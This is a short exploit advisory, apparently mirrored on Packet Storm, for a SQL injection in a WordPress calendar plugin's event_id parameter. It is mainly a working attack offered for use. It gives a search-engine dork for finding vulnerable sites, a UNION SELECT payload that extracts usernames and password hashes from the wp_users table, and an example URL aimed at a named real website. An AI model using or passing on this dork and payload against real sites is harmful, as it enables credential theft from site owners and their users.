The Wordpress Calendar plugin suffers from a remote SQL injection vulnerability.
08a05486f33d13a0e2be43057015560487fa5f32a66513b4948a18473bdc7f3cWordPress (?event_id=) Sql Injection Vulnerability
==========================================================
###########################################
.:. Author : HackXBack
.:. Email : h-b@usa.com
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : WordPress
.:. Script Download: http://wordpress.org/download/html
.:. Bug Type : Sql Injection [Mysql]
.:. Dork :"powered by WordPress" inurl:"/?event_id="
.:. Date : 31/1/2010
#############################################
===[ Exploit ]===
www.site.com/?event_id=[Sql]
www.site.com/Path/?event_id=[Sql]
Exploit:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
Example :
http://seattleplus10.org/calendar?event_id=-27 union select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
==========================================================
Greats T0 : Sec Attack Team & All Member In Sec Attack - Lebanese Hacker
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed